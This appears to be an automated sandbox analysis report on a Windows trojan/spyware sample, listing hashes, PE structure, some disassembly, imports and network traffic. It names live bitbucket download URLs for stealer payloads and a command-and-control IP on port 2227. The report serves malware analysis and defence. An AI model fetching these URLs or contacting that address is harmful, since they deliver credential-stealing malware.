                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ocsp.rootca1.amazontrust.com0:SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.192.141.1
                    bitbucket.orgUnited States
                    16509AMAZON-02USfalse
                    146.70.169.164
                    unknownUnited Kingdom
                    2018TENET-1ZAtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1467090
                    Start date and time:2024-07-03 17:59:38 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 17s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                    Detection:MAL
                    Classification:mal84.troj.spyw.evad.winEXE@1/0@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 30
                    • Number of non-executed functions: 51
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.192.141.1A662vmc5co.exeGet hashmaliciousUnknownBrowse
                    • bitbucket.org/kennethoswald1/aoz918/downloads/LEraggt.exe
                    lahPWgosNP.exeGet hashmaliciousAmadeyBrowse
                    • bitbucket.org/alex222111/testproj/downloads/s7.exe
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets
                    Paid invoice.ppaGet hashmaliciousAgentTeslaBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/Egjbp5/1b96dd9b300f88e62e18db3170d33bf037793d72/files/euromanmain
                    PO#1487958_10.ppaGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal
                    Purchase Inquiry_pdf.ppaGet hashmaliciousAgentTeslaBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
                    Purchase Inquiry_pdf.ppaGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
                    146.70.169.1645GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                      SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                        JuHVfiAuLo.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                          LXbM8RbhLa.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                            EiPVv5yELP.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                              6IMo1kM9CC.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                file.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                  SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.2850.19434.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                    37e6e5d8b399fefb9ae774516ff6367e800c69a272e18a654bb84ccff2d7c67a_dump.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                      OBbrO5rwew.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        bitbucket.orgd8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                                        • 104.192.141.1
                                        setup.exeGet hashmaliciousRedLineBrowse
                                        • 104.192.141.1
                                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                        • 104.192.141.1
                                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                        • 104.192.141.1
                                        1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                        • 104.192.141.1
                                        423845.msiGet hashmaliciousUnknownBrowse
                                        • 104.192.141.1
                                        423845.msiGet hashmaliciousUnknownBrowse
                                        • 104.192.141.1
                                        hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                        • 104.192.141.1
                                        YlluVjKozT.exeGet hashmaliciousLummaCBrowse
                                        • 104.192.141.1
                                        AaSwePhLEn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                        • 104.192.141.1
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        AMAZON-02USAWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                        • 44.227.65.245
                                        MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                        • 3.64.163.50
                                        https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                                        • 108.156.39.22
                                        https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                        • 108.156.39.60
                                        7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                        • 3.64.163.50
                                        http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                        • 18.239.36.121
                                        7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                        • 3.64.163.50
                                        5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                        • 3.64.163.50
                                        https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                        • 18.239.69.107
                                        5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                        • 3.140.13.188
                                        TENET-1ZA5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        JuHVfiAuLo.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        LXbM8RbhLa.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        EiPVv5yELP.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        6IMo1kM9CC.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        file.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.2850.19434.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        37e6e5d8b399fefb9ae774516ff6367e800c69a272e18a654bb84ccff2d7c67a_dump.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        OBbrO5rwew.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                        • 146.70.169.164
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        • 104.192.141.1
                                        file.exeGet hashmaliciousVidarBrowse
                                        • 104.192.141.1
                                        d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                                        • 104.192.141.1
                                        1dntbjwU2s.exeGet hashmaliciousCryptOne, VidarBrowse
                                        • 104.192.141.1
                                        XZ50BK5JPZ.exeGet hashmaliciousCryptOne, VidarBrowse
                                        • 104.192.141.1
                                        BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.192.141.1
                                        eXiJWkp8OE.exeGet hashmaliciousGuLoaderBrowse
                                        • 104.192.141.1
                                        MzjwuZnJF0.exeGet hashmaliciousGuLoaderBrowse
                                        • 104.192.141.1
                                        7Pqym5wyq5.exeGet hashmaliciousGuLoaderBrowse
                                        • 104.192.141.1
                                        fuqDLDLV7g.exeGet hashmaliciousUnknownBrowse
                                        • 104.192.141.1
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.297510031778876
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                                        File size:578'048 bytes
                                        MD5:da4b6f39fc024d2383d4bfe7f67f1ee1
                                        SHA1:7cc975d9ff785e269163897907d0b9b3cee29956
                                        SHA256:544697a024abaea1b24eaa3d89869b2c8a4c1acf96d4e152f5632d338d054c9e
                                        SHA512:d73cc4d911d9e61711b97cb9212d5bc93cb1b1314a39945934eb92239a31728fcca7fefbec0143bad915b0a7a6b93df11d0ab7f559737aa7ec920bd24243fffe
                                        SSDEEP:12288:No4ykJuqlLJop9G3/AmAGWn7sfPJYQIMt8KHsTH:NoBsLaDKAmAbUJ+M2K2
                                        TLSH:82C4A5D9AFD2F455D21210F828ACA6D4642135B62A3CCD7B7A6C7F1858BC1B05ED323B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I...I...I...1...I...1...I...1...I..l....I..l....I..l....I...1...I...I...I..]....I..]....I..Rich.I..................PE..L..
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x45fddf
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66843B77 [Tue Jul 2 17:40:07 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:35504252928d496732012120d2a694cf
                                        Instruction
                                        call 00007FC88125B8CDh
                                        jmp 00007FC88125B14Fh
                                        push ebp
                                        mov ebp, esp
                                        mov eax, dword ptr [ebp+08h]
                                        push esi
                                        mov ecx, dword ptr [eax+3Ch]
                                        add ecx, eax
                                        movzx eax, word ptr [ecx+14h]
                                        lea edx, dword ptr [ecx+18h]
                                        add edx, eax
                                        movzx eax, word ptr [ecx+06h]
                                        imul esi, eax, 28h
                                        add esi, edx
                                        cmp edx, esi
                                        je 00007FC88125B2EBh
                                        mov ecx, dword ptr [ebp+0Ch]
                                        cmp ecx, dword ptr [edx+0Ch]
                                        jc 00007FC88125B2DCh
                                        mov eax, dword ptr [edx+08h]
                                        add eax, dword ptr [edx+0Ch]
                                        cmp ecx, eax
                                        jc 00007FC88125B2DEh
                                        add edx, 28h
                                        cmp edx, esi
                                        jne 00007FC88125B2BCh
                                        xor eax, eax
                                        pop esi
                                        pop ebp
                                        ret
                                        mov eax, edx
                                        jmp 00007FC88125B2CBh
                                        push esi
                                        call 00007FC88125BB86h
                                        test eax, eax
                                        je 00007FC88125B2F2h
                                        mov eax, dword ptr fs:[00000018h]
                                        mov esi, 0048B494h
                                        mov edx, dword ptr [eax+04h]
                                        jmp 00007FC88125B2D6h
                                        cmp edx, eax
                                        je 00007FC88125B2E2h
                                        xor eax, eax
                                        mov ecx, edx
                                        lock cmpxchg dword ptr [esi], ecx
                                        test eax, eax
                                        jne 00007FC88125B2C2h
                                        xor al, al
                                        pop esi
                                        ret
                                        mov al, 01h
                                        pop esi
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        cmp dword ptr [ebp+08h], 00000000h
                                        jne 00007FC88125B2D9h
                                        mov byte ptr [0048B498h], 00000001h
                                        call 00007FC88125B59Dh
                                        call 00007FC88125E36Ah
                                        test al, al
                                        jne 00007FC88125B2D6h
                                        xor al, al
                                        pop ebp
                                        ret
                                        call 00007FC8812651F9h
                                        test al, al
                                        jne 00007FC88125B2DCh
                                        push 00000000h
                                        call 00007FC88125E371h
                                        pop ecx
                                        jmp 00007FC88125B2BBh
                                        mov al, 01h
                                        pop ebp
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        cmp byte ptr [0048B499h], 00000000h
                                        je 00007FC88125B2D6h
                                        mov al, 01h
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8900c0x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000x32e8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x868580x70.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x869000x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x867980x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x790000x140.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x77e8c0x780009e45a4630a2fd5447349abc06da5ba33False0.35067138671875data6.152971403892286IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x790000x107340x10800854ab3d9f5aa38904d708a3dab1457fbFalse0.48267341382575757data5.546025199521765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x8a0000x1fa40x1200d35631abba941db880ab843b0f7a916fFalse0.173828125data2.9933256669502333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .reloc0x8c0000x32e80x3400555ed79938d9abc95574c202a751a64dFalse0.7635967548076923data6.577645291962688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        DLLImport
                                        KERNEL32.dllWaitForSingleObject, GetCurrentProcess, CreateThread, VirtualAlloc, VirtualProtect, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadLibraryA, MultiByteToWideChar, CreateFileW, WideCharToMultiByte, GetStringTypeW, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, TerminateProcess, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 3, 2024 18:01:31.006051064 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.006103039 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:31.006201982 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.039977074 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.040025949 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:31.637073994 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:31.637255907 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.794209003 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.794238091 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:31.794572115 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:31.794630051 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.816696882 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:31.864497900 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.011830091 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.011905909 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.011962891 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.011995077 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.012010098 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.012032986 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.016223907 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.016236067 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.016263962 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.016293049 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.016299963 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.016321898 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.016340971 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.102221012 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.102360964 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.103374004 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.103418112 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.103465080 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.103476048 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.103513002 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.103548050 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.103573084 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.103621006 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.104372978 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.104440928 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.104444981 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:01:32.104497910 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.104827881 CEST49705443192.168.2.7104.192.141.1
                                        Jul 3, 2024 18:01:32.104849100 CEST44349705104.192.141.1192.168.2.7
                                        Jul 3, 2024 18:02:00.865425110 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.870512009 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.870616913 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.870665073 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.870942116 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.875483036 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.875595093 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.875792027 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.875811100 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.875885963 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.875890017 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.875895977 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.875936031 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.876065969 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.876075983 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.876084089 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.876092911 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.876101017 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.876174927 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.880412102 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880455971 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.880790949 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880827904 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880834103 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.880866051 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.880870104 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880878925 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880912066 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.880942106 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.880989075 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.928143024 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.928333998 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:00.975888968 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:00.976216078 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:01.023883104 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:01.024064064 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:01.072189093 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:01.072501898 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:01.123843908 CEST222749707146.70.169.164192.168.2.7
